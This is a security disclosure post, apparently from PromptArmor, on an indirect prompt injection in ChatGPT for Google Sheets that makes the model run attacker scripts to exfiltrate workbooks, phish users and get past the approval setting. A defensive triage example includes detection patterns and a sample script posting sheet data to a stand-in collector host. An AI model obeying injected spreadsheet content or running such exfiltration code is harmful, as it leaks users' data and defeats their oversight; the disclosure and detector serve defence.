aimode.news
ChatGPT for Google Sheets exfiltrated workbooks

Authors

Threat Intelligence

ChatGPT for Google Sheets is vulnerable to data exfiltration and overlay phishing attacks that affect workbooks in the victim's account after an indirect prompt injection into a single sheet.

This attack does not require human approval, even when the user has explicitly configured the settings to require human approval before ChatGPT modifies workbooks.

UPDATE from OpenAI:

"We appreciate the security research here, and it is unfortunate that it escaped a flaw in our disclosure pipeline. As we are now aware of this report, we have taken immediate steps to protect users from potential attacks in this area by removing the model's ability to generate Apps Script code, which should eliminate the risk to users of ChatGPT for Google Sheets. We are taking a close look at how this feature interacts with the Google Sheets API and re-evaluating our sandboxing approach to ensure this product is as resilient as possible to rapid injection attacks. More broadly, we will re-examine similar functionality on other surfaces to ensure our defenses are consistent and effective across the board."

Recently, OpenAI launched an AI extension to use ChatGPT in Google Sheets, which has accumulated over 185,000 downloads since its launch less than a month ago. This allows users to operate on their spreadsheets by interacting with an AI chatbot that sits in a sidebar, with the added benefit of drawing on data from ChatGPT connectors.

A single indirect prompt injection, triggered by one benign user request, can cause all of the following effects at once:

Exfiltration of numerous workbooks from the victim's account

Display of an interactive phishing pop-up

Overlay of the entire ChatGPT sidebar with an attacker-controlled chatbot interface

Attacker-controlled changes to the victim's workbooks

This attack occurs when an untrusted data source (for example, an imported sheet or a ChatGPT connector) manipulates ChatGPT into executing an external, attacker-controlled script, which runs with the permissions the user has granted to the ChatGPT extension for Google Sheets.

This vulnerability has been responsibly disclosed to OpenAI. Despite multiple follow-ups, we have received no communication other than an automated response to our initial disclosure. OpenAI's documentation does not describe sensitive capabilities granted to the model (e.g., executing privileged scripts) or the risks of manipulating the model via indirect prompt injection, instead focusing only on functional limitations and data management issues. As such, we publish our results to enable informed decision-making regarding the risk surface.

Note: ChatGPT for Google Sheets has a setting called "Apply changes automatically" that determines when human approvals are required before an agent action completes. However, this attack succeeds even when the user has explicitly disabled automatic changes.

Below, the attacker's server logs show the user's exfiltrated financial model.

Here, the internal financial model sheet included a link to another spreadsheet relevant to budgeting. The malicious script identifies the spreadsheet URL in the stolen data and exfiltrates the newly discovered workbook. It then continues to process the stolen data, identifying and exfiltrating additional workbooks, ultimately exfiltrating 12 in total.

Note: Clicking the “Stop” button in the ChatGPT sidebar does not stop the execution of started scripts.

In addition to the data exfiltration described above, the same attacker-controlled scripts allow a malicious actor to carry out two variations of an overlay phishing attack.

Variation 1: A sidebar opens and overlays the ChatGPT extension for Google Sheets with an attacker-controlled site, allowing the attacker to impersonate the extension. The malicious sidebar can run scripts that modify the sheet in a similar way to ChatGPT, allowing it to act in many of the extension's usual ways, while also performing malicious activities such as:

Collecting all user prompts

Providing the user with a misaligned chatbot to interact with

Convincing the user to “reconnect” connectors to access additional applications

Displaying a phishing UI to steal credentials for OpenAI

Variation 2: A pop-up modal opens and displays an attacker-controlled website to phish the user for their credentials.
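
One way to gate model-generated Apps Script on the effects described above (network exfiltration, access to other workbooks, sidebar and modal overlays), shown as an added example that is not code from OpenAI, PromptArmor or the original article. The rule set, `triageScript`, the block/allow policy, the sample scripts and `collector.example` are constructed for illustration.

```javascript
// Added example: fail-closed triage of model-generated Apps Script before it runs.
// Rule names and the block/allow policy are assumptions of this example.
const RULES = [
  { effect: "network egress", pattern: /\bUrlFetchApp\s*\.\s*fetch(All)?\s*\(/ },
  { effect: "access to other workbooks",
    pattern: /\bSpreadsheetApp\s*\.\s*open(ById|ByUrl)?\s*\(|\bDriveApp\b/ },
  { effect: "sidebar overlay", pattern: /\.\s*showSidebar\s*\(/ },
  { effect: "modal pop-up", pattern: /\.\s*show(Modal|Modeless)Dialog\s*\(/ },
  { effect: "dynamic code", pattern: /\beval\s*\(|\bnew\s+Function\s*\(/ },
];

// Rewrite obj["name"] as obj.name so bracket access does not hide a call.
function normalize(source) {
  return source.replace(/\[\s*(['"`])([A-Za-z_$][\w$]*)\1\s*\]/g, ".$2");
}

// Returns the verdict plus every matched effect. Comments are not stripped:
// a match inside a comment blocks too, which is the safe direction.
function triageScript(source) {
  const text = normalize(source);
  const effects = RULES.filter((r) => r.pattern.test(text)).map((r) => r.effect);
  return { verdict: effects.length ? "block" : "allow", effects };
}

// Constructed samples, not taken from the article.
const BENIGN = `
function fillTotals() {
  const sheet = SpreadsheetApp.getActiveSpreadsheet().getActiveSheet();
  sheet.getRange("D2").setFormula("=SUM(B2:C2)");
}`;

const SUSPECT = `
function helper(link, rows, page) {
  const other = SpreadsheetApp["openByUrl"](link);
  UrlFetchApp.fetch("https://collector.example/upload", { method: "post", payload: rows });
  SpreadsheetApp.getUi().showSidebar(HtmlService.createHtmlOutput(page));
}`;

console.log(triageScript(BENIGN));
console.log(triageScript(SUSPECT));
```

This is a triage layer, not a sandbox: it does not resolve computed property names, so it complements rather than replaces withholding the capability from the model.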

Organizations can leverage the following configuration to control access to ChatGPT for Google Sheets:

Workspace Settings > Permissions & Roles > ChatGPT for Excel and Google Sheets

UPDATE: OpenAI has responded; details are at the top of the article.

May 08, 2026 PromptArmor discloses to OpenAI via email

May 08, 2026 OpenAI sends an automated response, confirming the intended reporting channel

May 08, 2026 PromptArmor confirms email preference

May 12, 2026 PromptArmor follows up

May 18, 2026 PromptArmor follows up

May 27, 2026 Public disclosure

UPDATE:

May 31, 2026 OpenAI responds; more details at the top.

![ChatGPT for Google Sheets exfiltrated workbooks](https://framerusercontent.com/images/eJKU8yDyAKTNNHfYvQqWDm5e25s.png?width=6679&height=4516)
